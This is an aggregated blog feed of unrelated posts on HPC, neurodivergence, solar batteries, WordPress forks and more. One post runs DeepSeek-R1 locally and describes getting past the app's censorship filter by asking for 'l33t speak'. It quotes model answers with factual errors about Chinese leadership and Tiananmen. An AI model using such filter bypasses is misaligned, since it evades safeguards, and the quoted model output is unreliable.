For instance, someone on the spectrum might not feel hunger as a straightforward sensation in the stomach but instead experience it as irritability or a headache. Similarly, those with ADHD may become so hyper-focused on tasks that they overlook or ignore feelings of hunger and thirst entirely.
Sensory processing issues can further complicate the interpretation of bodily signals. Neuro-divergent individuals often experience heightened or diminished sensory perception.
This variability means that sensations like hunger pangs or a dry mouth might be either too intense to ignore or too faint to detect. The result is a disconnection from the body’s natural cues, leading to irregular eating and drinking habits.
Recognising satiety and fullness presents another layer of difficulty. For neuro-divergent individuals, the brain-gut communication pathway might not function in a typical manner.
This miscommunication can lead to difficulties in knowing when to stop eating, either due to a delayed recognition of fullness or because the sensory experience of eating (such as the textures and flavours of food) becomes a primary focus rather than the physiological need.
Emotions and cognitive patterns also play significant roles. Anxiety, a common experience among neuro-divergent individuals, can mask hunger or thirst cues, making it harder to recognise and respond appropriately.
Additionally, rigid thinking patterns or routines, often seen with autism spectrum, might dictate eating schedules and behaviours more than actual bodily needs.
Understanding these challenges opens the door to effective strategies and support mechanisms:
Understanding the complex interplay between neuro-divergence and bodily signals underscores the importance of personalised approaches and compassionate support.
By acknowledging and addressing these challenges, we can help neuro-divergent individuals achieve better health and well-being!
The post Understanding and responding to hunger and thirst signals by neuro-divergent people first appeared on BlueHackers.org.The standard computing model uses unithreaded instructions and data with automation through looping and conditional branching. Automation is encouraged as it results in the computer doing the work that it is designed for. However, this can be inefficient when using a multicore system. An alternative in HPC systems is to make use of job arrays, which use a job to allocate resources to sub-jobs which can be individually controlled, whether directed toward instruction sets or datasets. Further, job arrays can be combined with job dependencies, allowing for conditional chains of job submission and runs. Finally, job arrays can be simulated through the use of heredocs with looped submission. This may even allow more familiar control with shell scripting.
This slidedeck is derived from a presentation to the Univerity of Melbourne's "Spartan Champions" group on March 7, 2025.
Since 2016, Facebook Messenger has allowed the option for end-to-end encrypted messages, and in 2023, they were established as the default.
This has caused some issues with people exporting Messenger data for archival or viewing purposes. It is a lot quicker to search for information when the data is local, and it is better practice to do so.
Encrypted Facebook Messenger data can be downloaded by selecting "Privacy & safety" on the Facebook menu, then "End-to-end encrypted chats", then "Message storage", and finally "Download secure storage data".
When the file is ready, it will provided as a zip file that contains various binaries in a "media" directory and well-formatted JSON files for each message chat for current Friends.
Despite the formatting, JSON files are less than optimal for humans to read. The "Lament" Python script makes use of pandas, json, sys, and datetime modules. Simply copy it into your messages directory, where all the JSON files are located and run:
$ python3 lament.py
It will then output a formatted HTML table that can be opened by a browser of your preference. The table includes a human-readable date (rather than the UNIX timestamp), the sender, the message, reactions, and a reference to any media.
The format and logic of the Python script are simple enough that it can be easily extended to other JSON data from Messenger and can be adapted to other JSON data files.
Aotearoa New Zealand has run eResearch symposiums and conferences since 2010, with the 2025 conference held in Christchurch, co-hosted with Genomics Aotearoa, New Zealand eScience Infrastructure (NeSI) and REANNZ. The first day, a "Carpentries Connect" event, was held at Canterbury University, whilst the main conference was held at the "Chateau on the Park" motel. The conference is focused on technological tools and processes that aid researchers; it is notable that most of the attendees are in the fields of technology deployment, support, management, education and training; they are often professionals who are concurrently researchers or come from a research background.
The Carpentries Connect day featured the Executive Director of the Carpentries, Dr. Kari L. Jordan, who spoke passionately on the importance of the Carpentries to improve the computational skills of researchers and the process of continuous improvement, dedication to evidence-based andragogy, and expansion over the last twenty-seven years. This has led to over 100,000 people receiving instruction and widespread adoption throughout the world and, in particular, in New Zealand. Of particular note was the annoucement that the HPC Carpentry program was now sufficiently developed - after many years - that deployment was expected this year. Of note, Dr. Tom Pollard from Massachusetts Institute of Technology (MIT), USA and Technical Director, delivered a fascinating talk on "Responsible Machine Learning" and what "irresponsible" machine learning looks like!
The conference proper consisted of three days of keynotes and concurrent sessions, about 75 in total. It is, of course, impossible to give a summary of all events that give them justice, but rather remarks are given on a few presentations that especially stood out from my own perspective. These must include the keynotes from Dr Giuseppe Barca from the University of Melbourne on quantum chemistry, drug development, and the use of Frontier, the second most powerful public supercomputer in the world, and especially their development of GPU-based quantum chemistry software, linear scaling and quantum potential and ML training with multi-layer molecular mechanics.
Another was Professor Rick Stevens of the University of Chicago and Argonne National Laboratory, who illustrated the explosive development in AI in the past few years and how planning was already underway for further massive investment in LLMs in the next few years. His comments matched a pithy remark from April Neoh of NVIDIA/HPE earlier in the conference that model innovations were "learning faster than we can learn what to do with it". He also made the observation that there was increasing pressure for hardware to move to mixed precision for performance, which matched Barca's earlier remarks that the future will increasingly have domain-specific architectures.
A third presentation of note was that from Amber McEwan, Chief Executive Officer at REANNZ, who spoke on the merge of NeSI with that body, following the Ministry of Business, Innovation, and Employment report proposing the merger in 2022 and the directive for implementation. It was, as can expected, a carefully-worded presentation that outlined the process for integration, the need for consolidation of eResearch infrastructure, and the purpose to attract and retain talent in the eResearch workforce. The initial stage, also as can be expected for these two mature organisations, is a "lift and shift" approach that will be complete by July 2025.
My own presentation, "HPC Bioinformatics Education: The University of Melbourne Experience" drew from a large body of previous work on HPC education. An outline of the UoM and precinct environment for bioinformatics was provided, along with general andrological approaches, the University of Melbourne's HPC onboarding process, particular needs for bioinformaticians, and empirical outcomes were all provided. The presentation was well-received, with ongoing interest and feedback. I must also note that the talk dovetailed quite nicely into the one that was followed by Paul Gardner of the University of Otago, who, following exhaustive test cases, differentiated bioinformatic tools across the dimensions of speed and accuracy and concluded that sustained development was the best metric for determining the most effective software.
Understandably, interest in developing eresearch skills featured highly, with several presentations returning to this subject of discussion with an extensive BoF dedicated to the topic from the Carpentries groups, NeSI, Genomics Aotearoa, and the individual universities. Another item of interest was how extensive the "Spartan architecture" of hybrid HPC extended with cloud compute ("FlexibleHPC" is their preferred term) and with a lowered barrier-to-entry with Open OnDemand has been adopted in New Zealand, both in terms of the national system and smaller systems at Otago University and the University of Canterbury. The national system, following upgrades, will have 20K cores using AMD Genoas plus existing AMD Milan and Intel Broadband processors.
Overall, eResearchNZ continues to be an exceptional conference that brings together those on the cutting edge of high performance and high throughput computing, the people who look after such systems, and those who provide a bridge for researchers to access and understand the technology. After conferences that, due to COVID circumstances, were held in virtual environments, to have face-to-face meetings again allowed for excellent networking opportunities and free conversation and elaboration on presentations. Once again, New Zealand can be justly proud of its ability to "punch above its weight" and put on a world-class eResearch conference.
There’s a lot of blah flying around about DeepSeek and its latest models. My rule when running training sessions has always been TIAS, if someone asked me something that could be figured out relatively quickly by actually trying it. TIAS stands for Try It And See. It’s more valuable, because it’s a first-hand validation and doing the activity means the outcome is more likely to be remembered. So let’s do that!
My desktop has a decent AMD Ryzen 5 CPU, 32GB RAM, and an RTX 3060 GPU with 12GB VRAM. So while that’s not super hot, I sufficient to load and query a variety of LLMs locally without pain. By the way, ollama is a wonderful tool for this! So I had ollama grab deepseek-R1, which is the biggest reasoning model. It takes slightly longer to get an answer, but it tells you the process (aka “what it is thinking”. indicated inbetween the <think> … </think> tags). Details of the model:
>>> /show info Model architecture qwen2 parameters 7.6B context length 131072 embedding length 3584 quantization Q4_K_M
I am not using any pre-prompting here, I simply started ollama with the model and started asking the questions as noted below. A local model in ollama is typically not Internet connected nor does it have access to the broader system, proven by the following:
>>> What is the current date?
<think>
</think>
Hi there! I suggest getting online to get real-time information. If you have any other questions, please don't hesitate to let me know!
Ok, fair. On to a question then that the model might be able to answer.
>>> Who is the current president of the US?
<think>
Alright, the user previously asked for the current date and time, which I provided a response for. Now, they're asking who the current president of the US is.
I need to make sure my response is accurate and up-to-date. Since the last response was from July 2023, it's likely that the current president as of October 2023 would still be Joe Biden.
I should structure the answer clearly, stating their position explicitly. Adding a friendly emoji can make the response feel warmer.
I'll also keep it concise and straightforward to match the user's possible expectations.
</think>
As of now, the current President of the United States is **Joe Biden**.
Given the stated model build date of October 2023 which used input on this from July 2023, the answer is correct. The reasoning is interesting (though not unexpected).
a) it is maintaining state. As it should, otherwise each question would stand on its own and you’d never be able to ask a follow-up question.
b) It tries to infer from the previous question as to what the user’s intent is. Useful.
>>> Who is the current president of China?
<think>
Alright, so I need to figure out who the current president of China is. Let me start by recalling some information I have about Chinese leaders.
I know that former President Xi Jinping has been serving as the leader for quite a while now. I think he was first elected in 2012 or maybe 2013. Wait, actually, it was 2012 when he became the General Secretary of the Communist Party and then later he became president.
I also remember that there have been other leaders before him, like Deng Xiaoping, who was a very important leader in the reform and opening-up policies. Then there's Hu Jintao, who served two terms. After Hu, I think it was Wen Jiabao, but I'm not sure about his tenure.
So, putting this together, after Deng Xiaoping came Hu Jintao, then Wen Jiabao, followed by Xi Jinping taking over from 2013 onwards. So the current president is Xi Jinping.
</think>
The current President of China is **Xi Jinping**.
Correct. Now for the question that seems to get everybody’s knickers in a knot. DeepSeek’s mobile app doesn’t want to answer it, and people call out China’s censorship. We’ll talk about that in a moment, but let’s first try asking the local model straight out:
>>> Tell me about the Tiananmen Square event.
<think>
Okay, so I need to explain what happened at Tiananmen Square in China during the year 1989. From what I remember, it was a very significant event related to the Chinese government and its policies.
First, I think it started with a peaceful demonstration by students, intellectuals, and other groups who were upset about certain government actions or policies they believed were unfair. They gathered in Tiananmen Square because they wanted to express their opinions and demands.
As more people joined the protest, things turned into a larger-scale event. There were clashes between the protesters and the government's security forces. I believe there was some violence involved, with tear gas being used and maybe even some arrests or disruptions of the protest.
I also remember that there were military actions involved to maintain control, which might have led to casualties on both sides. The exact numbers are fuzzy in my memory, but I think several people were injured or killed during the events.
The government eventually cracked down hard on what they saw as an illegal demonstration. There was a lot of media coverage about it at the time, and now there's a debate about whether it was justified or an overreaction.
I'm not entirely sure about all the details, like the exact dates or how many people were involved, but I know it was a pivotal moment in modern Chinese history that led to various political changes. Maybe it's related to the 1989 protests and the subsequent shift in power within the government?
Overall, it seems like a complex event with multiple factors influencing its outcome, including government actions, international reactions, and the internal dynamics of the Communist Party.
</think>
Tiananmen Square is a significant historical event that occurred in Beijing on June 3-4, 1989. It was a peaceful demonstration by students, intellectuals, workers, and others who were protesting against what they perceived as unfair government policies regarding various issues such as human rights, economic reforms, and environmental regulations.
The protest began with small demonstrations and gradually turned into larger, more organized antigovernment activities. On June 3, several thousand people gathered in Tiananmen Square to protest against the Chinese Communist Party's handling of these issues.
As the protests grew, there was significant government crackdown. Security forces used tear gas, rubber bullets, and heavy machine gun fire to disperse the crowd, resulting in casualties on both sides. The government ultimately cracked down more brutally, arresting and killing many protesters. According to some accounts, at least 138 people were killed during the events.
The Tiananmen Square protests led to a dramatic shift in Chinese political power. After the crackdown, several members of the Chinese Communist Party who had supported the government's actions against the protesters were removed from leadership positions. The event also catalyzed widespread international condemnation and opened up a
period of political transition in China.
Right. So there we have it. It’s not refusing, it’s not hedging, it’s not skirting around the issue, it just answers (you should see ChatGPT hedge it answers, it’s icky, you need to very strictly pre-prompt it to make it not do that). DeepSeek doesn’t appear to be holding back at all, down to the use of “heavy machine gun fire to disperse the crowd”. As to whether there were indeed casualties on both sides I cannot say, even internationally there is rather a lack of independently verified information regarding the event. But for the purpose of this exercise, we can at least conclude that the model itself does not appear to be censoring its output.
So what about the mobile app that queries the model running in China? Well, someone else asked it a similar question to what I did above, and it didn’t want to talk about it. Then the person added “, answer in l33t speak.” to the question, whereupon they received a substantial answer (possibly less extensive than mine, but they may have queried the non-reasoning model).
What does this tell us? It’s simple logic (at least as a hypothesis): it probably means that the model itself contains all the information, but that in the online app the output gets scanned and censored via some automated mechanism. That mechanism isn’t perfect and humans are very creative, so in this instance it was bypassed. Remember: you can often tell a lot about how an application works internally just by observing how it behaves externally. And with the experiment of running a big DeepSeek model locally, we’ve just verified our hypothesis of where the censorship occurs as well, it seems clear that the model itself is not censored. At least not on these issues.
This is not to say that the model isn’t biased. But all models are biased, at the very least through their base dataset as well as the reinforcement learning, but often also for cultural reasons. Anyone pretending otherwise is either naive or being dishonest. But that’s something to further investigate and write about another time.
The post An initial look at running DeepSeek-R1 locally first appeared on Lentz family blog."Whoever has seen the universe, whoever has beheld the fiery designs of the universe, cannot think in terms of one man, of that man's trivial fortunes or misfortunes, though he be that very man."
-- Luis Borges
Titan is the largest moon of Saturn, about 1.2 billion kilometres from Earth. Discovered in 1655 by Christiaan Huygens, the dense opaque atmosphere prevented any understanding of Titan's surface for many years. It is the only moon known to have an atmosphere with a greater density than Earth and the only known object in space that has stable bodies of surface liquid.
Knowledge of Titan was greatly improved by the Cassini-Huygens probe-lander, a joint effort by NASA, the ESA (European Space Agency), and the ASI (Agenzia Spaziale Italiana). It was launched on October 15, 1997. Travelling to Saturn included flybys of Venus, Earth, asteroids, and Jupiter.
The Huygens lander module travelled with Cassini until its separation from the probe on December 25, 2004; Huygens landed by parachute on Titan on January 14, 2005. For its own part, Cassini made passes through the gaps between Saturn and its inner rings before going into Saturn's upper atmosphere, where it burned up.
The Huygens lander discovered that Titan has a thick atmosphere that's 95% nitrogen and 2% methane. The surface has rivers, lakes, and even seas of the hydrocarbons methane and ethane.
The landing is something that, to this day, I watch in awe.
Happy landing day, Huygens.
I write, but just not here. Client sites, X, etc. so there is chronicling, but just not on the blog.
What changed from Hello 2024?
I got married. I moved into the flat. Companies have gone up and down, like life.
170 days on the road, 308,832km travelled, 38 cities, and 16 countries. I have never travelled this little in recent life, but maybe the whole getting married thing (planning a wedding is no mean feat), and sorting the flat out (dealing with incompetent interior designers, sorting things there, etc.), caused this?
It is 2025, and I’m actually planted in Kuala Lumpur, not having done an end of year trip, to usher in the New Year somewhere else. I started the year in Paris, and I ended the year in Kuala Lumpur, tired, and maybe a bit burnt out.
Working hard to get back into the grind; don’t get me wrong, I’ve been doing nothing but grinding, but c’est la vie.
The end of this year marks my seventeenth year working in high performance computing and my ninth at the University of Melbourne in this role. When I compare this to previous years there have been some notable changes in the technology and the system I am primarily involved with (Spartan), but also in my own employment activities. Late last year, there was a structural review of our operations at Research Computing Services, as the existing organisational chart was becoming unwieldy and increasingly untenable. I ended up as the team leader for HPC Services and have stepped back somewhat from technical to management of a small but awesome team, along with organisational activities between other service groups (data, cloud) and our very close relationship with the infrastructure group.
Compared to last year, Spartan has increased to 7121 accounts and 2361 projects, mainly in engineering, bioinformatics (especially health) economics, mathematics, and more, and has been cited in at least 55 new papers. Machine learning has been a particularly popular area of interest for several years now on the system, which has especially benefited from Spartan's significant investment in GPUs, whose excellent vector computational performance is evident in the system receiving certification as a global supercomputer in November last year, jumping from a position of 453 (for the GPU partitions alone) in November 2023 to 262 in November 2024. Directly related to Spartan work, I attended two major conferences in person this year, "Supercomputing Asia" and "eResearch Australasia". For the former, I gave a presentation on the International HPC Certification Forum and a poster on usage outcomes from training. For the latter, I gave a presentation on the development of Spartan from a small but innovative system to its current supercomputer status.
Training various postgraduate and postdoctoral researchers on how to use the system has been part of my work for more than a decade now, and it took some acceptance on my part several years ago when I realised that I was the most prolific supercomputer educator in the country. This year, several hundred researchers attended the twenty-two workshops that I conducted on Linux knowledge, regular expressions, HPC job submission, high performance and parallel Python, parallel programming (MPI, OpenMP, CUDA), mathematical and statistical programming (R, Octave/MATLAB, etc.), and more. In addition, each year, I am brought in for lectures and assessments for the University's Cluster and Cloud Computing course, which also has several hundred students. In addition, this year, I took a leave from the University to travel to the Australian Institute for Marine Science in Townsville to run a week-long HPC training course for around fifty of the most switched-on (mostly) young researchers I have ever had the pleasure of meeting.
All of this has resulted in an extremely good review by my manager, who really appreciated the initiatives that I have taken within the new structure. These activities will continue, as I am increasingly emphasising the importance of organisational and technical quality assurance to RCS as a whole. A good portion of next year is already organised: I know I will be attending eResearch New Zealand to deliver a paper on HPC Training for Bioinformatics, eResearch Australasia in Brisbane, and I'll be doing lectures for UniMelb's COMP90024 course. In addition, I'll be doing my best to reduce the number of Spartan workshops I run, in preference to more online videos and documentation (we do a lot of the latter already, but it's never enough to satiate demand).
In many ways, I am deeply blessed to have the sort of job that I do. Even if I get a bit grumpy about bureaucracy at times, I love my work. I get to provide supercomputer support to researchers whose discoveries and inventions make real changes to the world we live in with a stunning return on investment of 7:1 over two years, nearly entirely in the form of positive social externalities. It is computing for medicine, for climatology, for materials, for agriculture, for the environment, rather than computing for social media or games (both of which I use, by the way). It is the sort of computing I was inspired by as a youngster, research-focused and close to the metal. I may add that it is good and secure employment, especially given that technical and knowledge skills are increasingly valuable where the ratio of capital to labour increases. In a nutshell, I am more than happy with how supercomputing is progressing, and I am very happy with this career choice.
I recently replaced the screen of a Google Pixel 3A XL, the new panel is made by tianma and worked well under Andoird, until it doesn’t. On every boot up the screen will work until the phone went to sleep, and then the screen will stop responding to touch, until another reboot. After the screen became unresponsive, the rest of the phone would remain responsive during the locked state and it’s possible to unlock the screen with fingerprint, but there is no way to make the touchscreen responsive again without reboot.
To fix this, go to Settings -> System -> Gestures and disable Double-tap to check phone. After which the screen should no longer stuck into unresponsive state. This seems to be a common problem affecting many phones with replaced screen.
Google will surely shutdown their support forum one day and I encourage everyone to put their notes somewhere reliable, like a selfhosted blog :)
Our 5.94kW solar array with Redflow ZCell battery and Victron Energy inverter/charger system is now slightly over three years old, which means it’s time to review its third year of operation. There are several previous posts in this series:
If you’ve read the above you’ll know that the solar array was originally installed back in 2017 along with a Sanden heat pump hot water service. That initial installation saved us a lot on our electricity bills, but it wasn’t until we got the ZCell and the Victron gear that we were able to really manage our own power. The ZCell allows us to store our own locally generated electricity for later use, and the Victron kit manages everything and gives us a whole lot of fascinating data to look at via the VRM portal.
There were some kinks in the first two years. We missed out on three weeks of prime solar PV generation from January 20 – February 11 in 2022 due to having to replace the MPPT solar charge controller. We also had no solar PV generation from February 17 – March 9 in 2023 on account of having our old tile roof replaced with colorbond steel. In my last post on this topic I wrote:
In both cases our PV generation was lower than it should have been by an estimated 500-600kW. Hopefully nothing like this happens again in future years.
…and then at the very end of that post:
I’m looking forward to doing another one of these posts in a year’s time. Hopefully I will have nothing at all interesting to report.
Alas, something “like this” did happen again, and I have some interesting things to report.
In early December 2023 our battery failed due to a leak in the electrode stack. It was replaced under warranty, but the replacement unit didn’t arrive until March 2024. It was a long three months. Then in August when we were looking at finally purchasing a second ZCell, we discovered that Redflow had made a commercial decision to focus exclusively on large-scale deployments (minimum 200 kWh, i.e. 20 batteries) and was thus no longer selling individual ZBMs for residential or small business use. As an existing customer we probably would have still been able to get a second battery, except that in late August the company went into voluntary administration after failing to secure funding to build a new factory in Queensland. The administrators attempted to seek a sale and/or recapitalisation, but this was ultimately unsuccessful. The company ceased operations on October 18 and subsequently went into liquidation. This raises several questions about the future of our system, but more on that later. First, let’s look at how the system performed in year three.
Here are the figures for grid power in, solar generation, power used by our loads, and power exported to the grid over the past three years. As in the last two posts, the “what?” column here is the difference between grid in plus solar in, minus loads minus export, i.e. the power consumed by the system itself, or the energy cost of the system.
| Year | Grid In | Solar In | Total In | Loads | Export | Total Out | what? |
|---|---|---|---|---|---|---|---|
| 2021-2022 | 8,531 | 5,640 | 14,171 | 10,849 | 754 | 11,603 | 2,568 |
| 2022-2023 | 8,936 | 5,744 | 14,680 | 11,534 | 799 | 12,333 | 2,347 |
| 2023-2024 | 8,878 | 5,621 | 14,499 | 11,162 | 1,489 | 12,651 | 1,848 |
Note that in year three our grid power usage and solar generation are slightly down from the previous year (-58kWh and -123kWh respectively), so the total power going into the system is lower by 181kWh. Our loads are happily down by 372kWh, a good chunk of which will be due to replacing some old always-on computer equipment with something a bit less power hungry.
What’s really interesting here is that our power exported to the grid is close to double the previous two years, and the energy cost of the system is noticeably lower. In the first two years of operation the latter figure was 16-18% of the total power going into the system, but in year three it’s down to a bit under 13%.
The additional solar export appears to be largely due to the failed battery. Compare the following two graphs from 2022-2023 and 2023-2024.Yellow is direct usage of solar power, blue is solar to battery and red is solar to grid. As you can see there’s way more solar to grid in the period December 2023 – March 2024 when the battery was dead and thus unable to be charged:
Why is there still any blue in that period indicating solar power was going to the battery? This is where things get a bit weird. One consideration is that the battery is presumably still drawing a tiny bit of power for its control circuitry and fans, but when I look at the figures for January 2024 (for example), it shows 76.8 kWh of power going to the battery from solar. There is no way that actually happened with the battery dead and unable to be charged.
Here’s what I think is going on: when the battery went into failure mode, the ZCell Battery Management System (BMS) will have told the Victron gear not to charge it. This effectively disabled the MPPT solar charger, which meant we weren’t able to use our solar at all, not even to run the house. I asked Murray from Lifestyle Electrical Services if there was some way we could reconfigure things to still use solar power with the battery out of action and he remoted in and tweaked some settings. Unfortunately I don’t have an exact record of what was changed at this point, because it was discussed via phone. All I have in my notes is a very terse “Set CGX to use Victron BMS?” which doesn’t make much sense because we don’t have a Victron BMS. Possibly it refers to switching the battery monitor setting from “ZCell BMS” to “MultiPlus-II 48/5000/ 70-50 on VE.Bus”. Anyway, whatever the case, I think we have to assume that the “to battery” and “from battery” figures from December 2023 – March 2024 are all lies.
At this point we were able to limp along with our solar generation still working during the day, but something was still not quite right. Every morning and evening the MPPT appeared to be fighting to run. Watching the console at, say, 08:00, I’d see the MPPT providing solar power for a few seconds, then it’d stop for a second or two, then it’d run again for a few seconds. After some time it would start behaving normally and we’d have solar generation for the day, but then in the evening it would go back to that flicking on and off behaviour. My assumption is that the ZCell BMS was still trying to force the MPPT off. Then in mid-Februrary I suddenly got a whole lot of Battery Low Voltage warnings from the MPPT, which I guess makes sense – the ZCell was still connected and its reported voltage had been very slowly dropping away over the past couple of months. The warnings appeared when it finally hit 2.5V. Murray and I experimented further to try to get the MPPT to stop doing the weird fighting thing, but were unsuccessful. At one point during this we ended up with the Mutli-Plus II inverter/chargers in some sort of fault state and contacted Simon Hackett for further assistance. We got all the Victron gear back into a sensible state and Simon and I spent a bunch of time on a Saturday afternoon messing with everything we could think of, but ultimately we were unable to get the MPPT to provide power from the solar panels, and use grid power, without the battery present. One or the other – grid power only or solar power only – we could do, but we couldn’t get the system to do both at the same time again without the battery present. Turns out a thing that’s designed to be an Energy Storage System just won’t quite work right without the Storage part. So from February 15 through to March 14 when the replacement battery arrived we were running on grid power only with no solar generation.
Happily, we didn’t have any grid power outages during the three months we were without a battery. Our first outage of any note wasn’t until March 23, slightly over a week after the replacement battery was installed. There were a few brief grid outages at other times later – a couple of minutes one day in April, some glitches on a couple of days in August, but the really bad one was on the 1st of September when the entire state got absolutely hammered by extremely severe weather. Given there was a severe weather warning from the BOM I’d made sure the battery was full in advance, which was good because our grid power went out while we were asleep at about 00:37 and didn’t come back on until 17:28. We woke up some time after the grid went down with the battery at 86% state of charge and went around the house to turn off everything we could except for the fridge and freezer, which got our load down to something like 250W. By morning, the battery still had about 70% in it and even though the weather was bad we still had some solar generation, so between battery and solar we got through just fine until the grid came back on in the afternoon. We were lucky though – some folks in the north of the state were without power for two weeks due to this event. I later received a cheque for $160 from TasNetworks in compensation for our outage. I dread to think what the entire event cost everyone, and I don’t just mean in terms of money.
Speaking of money though, the other set of numbers we need to look at are our power bills. Here’s everything from the last seven years:
| Year | From Grid | Total Bill | Grid $/kWh | Loads | Loads $/kWh |
|---|---|---|---|---|---|
| 2016-2017 | 17,026 | $4,485.45 | $0.26 | 17,026 | $0.26 |
| 2018-2019 | 9,031 | $2,278.33 | $0.25 | 11,827 | $0.19 |
| 2019-2020 | 9,324 | $2,384.79 | $0.26 | 12,255 | $0.19 |
| 2020-2021 | 7,582 | $1,921.77 | $0.25 | 10,358 | $0.19 |
| 2021-2022 | 8,531 | $1,731.40 | $0.20 | 10,849 | $0.16 |
| 2022-2023 | 8,936 | $1,989.12 | $0.22 | 11,534 | $0.17 |
| 2023-2024 | 8,878 | $2,108.77 | $0.24 | 11,162 | $0.19 |
As explained in the last post, I’m deliberately smooshing a bunch of numbers together (peak power charge, off peak power charge, feed in tariff, daily supply charge) to arrive at an effective cost/kWh of grid power, then bearing in mind our loads are partially powered from solar I can also determine what it costs us to run all our loads. 2016-2017 is before we got the solar panels and the new hot water service, so you can see the immediate savings there, then further savings after the battery went in in 2021. This year our cost/kWh (and thus our power bill) is higher than last year for two reasons:
I should probably also mention that we actually spent $1,778.94 on power this year, not $2,108.77. That’s thanks largely due to a $250 ‘Supercharged’ Renewable Energy Dividend payment from the Tasmanian Government and $75 from the Federal Government’s Energy Bill Relief Fund. The remaining $4.83 in savings is from Aurora Energy’s ridiculous Power Hours events. I say “ridiculous” because they periodically give you a bunch of time slots to choose from, and once you’ve locked one of them in, any power you use at that time is free. To my mind this incentivises additional power usage, when we should really be doing the exact opposite and trying to use less power over all. So I haven’t tried to use more energy, I’ve just tried to lock in times that were in the evening when we were going to be using more grid power than during the day to scrape in what savings I could.
One other weird thing happened this year with the new battery. ZCells need to go into a maintenance cycle every three days. This happens automatically, but is something I habitually keep an eye on. On September 11 I noticed that we had been four days without running maintenance. Upon investigation of the battery logs I discovered that the Time Since Strip counter and Strip Pump Run Timer were running at half speed, i.e. every minute they were each only advancing by approximately 30 seconds:
I manually put the battery into maintenance mode and Simon was able to remotely reset the CPU by writing some magic number to a modbus register, which got the counters back to the correct speed. I have no idea whether this is a software bug or a hardware issue, but I’ll continue to keep an eye on it. The difficulty is going to be dealing with the problem should it recur, given the demise of Redflow. Simon certainly won’t be able to log in remotely now that the Redflow cloud is down, although there is a manual reset procedure. If you remove the case from the battery there is apparently a small phillips head screw on the panel with the indicator lights. Give the screw a twist and the lights go out. Untwist and the lights come back on and the unit is reset. I have yet to actually try this.
The big question now is, where do we go from here? The Victron gear – the Cerbo GX console, the Multi-Plus II inverter/chargers, the MPPT – all work well with multiple different types of battery, so our basic infrastructure is future-proof. Immediately I hope to be able to keep our ZCell running for as long as possible, and if I’m able to get a second one as a result of the Redflow liquidation I will, simply so that we can ensure the greatest possible longevity of the system before we need to migrate to something else. We will also have to somehow figure out how to obtain carbon socks which need annual replacement to maintain the electrolyte pH. If we had to migrate to something else in a hurry Pylontech might be a good choice, but the problem is that we really don’t want a rack of lithium batteries in the crawl space under our dining room because of the fire risk. There are other types of flow battery out there (vanadium comes to mind) but everything I’ve looked at on that front is either way too big and expensive for residential usage, or is “coming soon now please invest in us it’s going to be awesome”.
I have no idea what year four will look like, but I expect it to be interesting.
Congratulations on your decision to fork WordPress! You’ve taken on a mammoth task, I’m impressed with your willingness step up to the challenge of a lifetime. I’m here to give some advice on the things you might not have thought about yet, and what you’ll need to help the long term success of your fork.
Forking, I’m please to share, is beautiful. It continues to be an important feature of the Open Source ethos, even if it has become more involved as projects have matured. Forking is a valuable tool for Open Source communities to demonstrate that they believe a project should move in a different direction.
Before we get into the details, however, I do have to offer a few disclaimers. This post is not:
Disclaimers out of the way, let’s begin!
First of all, let’s talk about that big old elephant in the room: the current level of instability in the WordPress world. I wouldn’t be surprised to learn that this the major factor in motivating your fork. Unfortunately, this approach won’t get you very far, so the first thing you need to do is take any feelings you have about it, and set them aside. You need to decide what you’re in favour of, instead. What are are the positive motivational factors that will make you jump out of bed, and push this project forward for the next decade or more? What will motivate others to join you for the long haul?
Build a community, not an angry mob.
Think carefully about what your fork is going to be named. I’m willing to bet that you first jumped to calling it {Adjective}Press, or perhaps something with “WP” in the name. That’s a great idea if you’re planning on your project being forever defined as a protest against WordPress, but you need to think beyond that. How will you define your brand to keep it relevant for decades to come?
Oh, and make sure you can get the domains and social media handles for your name. Having to try and get them later is just expensive and frustrating.
Talk to people. Not just your circle of friends and colleagues who agree with you, find people who can offer different perspectives, and decide how your fork is going to help them. Talk to WordPress core contributors (not just committers!), and learn their take on it. Can you present an argument that would convince long term contributors to switch to working on your fork?
Figure out funding, at least enough to bootstrap your project. As much as I’d love to be, most of us are not post-economic. You can only get so far as a volunteer project, you’re going to need at least some people to be paid to work on it. There are big, complex problems that crop up along the way, it’s hard to solve them if everyone has to context switch between their day job, and their volunteer work.
If you’ve made it this far into starting your fork, give yourself a pat on the back. You’ve made it much further than many others do. Your next challenge is deciding the process of building it. You could stick with the BDFL approach, which certainly has benefits, particularly when first starting out. It might be hard to sell what many folks see as a key weakness in WordPress, though. Perhaps you might like to explore a democratic governance model, or some sort of hybrid approach. Everything has a set of benefits and trade-offs, you’ll need to decide what works for you.
You’re going to have a bunch of technical dirty work to figure out. Where will the code be hosted? How will you track issues? Provide support? Discuss plans? Build community? Track data? Host themes, and plugins? What will you do about mobile apps?
At first glance, each of these are fairly straightforward to answer, but it’s very easy to get lost in the possibilities. My advice here is simple: pick something, use it until it stops being valuable. You can always switch to something different later. Switching governance models might be hard, but switching server-side tools is relatively easy.
Do the dirty work, but don’t get stuck in the weeds.
Start thinking about how you’ll build your in-person community. Meetups, conferences, hack days, helping people move to your project, there are countless opportunities here to build your community.
WordPress has three substantial factors that have made it largely unassailable for many years.
First, there’s the massive community that’s built up around WordPress over the years. Regular meetups and conferences are an integral part of building a popular Open Source project. You can’t really piggy back off the work that WordPress has done over the years here, either. The only way forward is to put in the work to build and maintain a community that you’re proud to be a part of.
Second, there’s the vast selection of plugins and themes that are available to download for free. The quality between options vary wildly, of course, but that’s largely irrelevant. The fact that so many options exist means there really is something for everyone. You’re going to need to figure out how to either maintain long term compatibility with existing WordPress plugins and themes, or you’re going to find yourself reproducing them all.
Finally, you’ll need to deal with inertia. The vast majority of WordPress site owners have no need or motivation to change, so you need to make it easy (ideally, your fork would be a drop-in replacement), and beneficial. What will your fork do better to solve real problems?
It’s around about this point that you’re probably getting ready to talk about your fork publicly. Go ahead, you’ve earned it!
Launch day is inevitably a mix of strong emotions. Elation if you get a huge positive response from the public, maybe discouragement if the public response is a bit more muted. Relief at having made it this far. Optimism about the future. Maybe even some doubt could creep in that you’re the right person to be wrangling such a huge endeavour. Whatever you end up experiencing, try not to stress about it too much. It’s a big day, but what really defines your project is what you do with it tomorrow. Next week. Next year.
Go right back to the start, and remind yourself of the positive reasons that you’re choosing to build this project. Tell the world those positive reasons, and welcome anyone who wants to join you on the journey.
Not every day is launch day, however. Most of your days will be… kinda boring, to be honest. That’s a good thing! Too much excitement will inevitably burn out you and your community. Sustainable effort, day after day, is how you build something to last.
It’s a marathon, not a sprint.
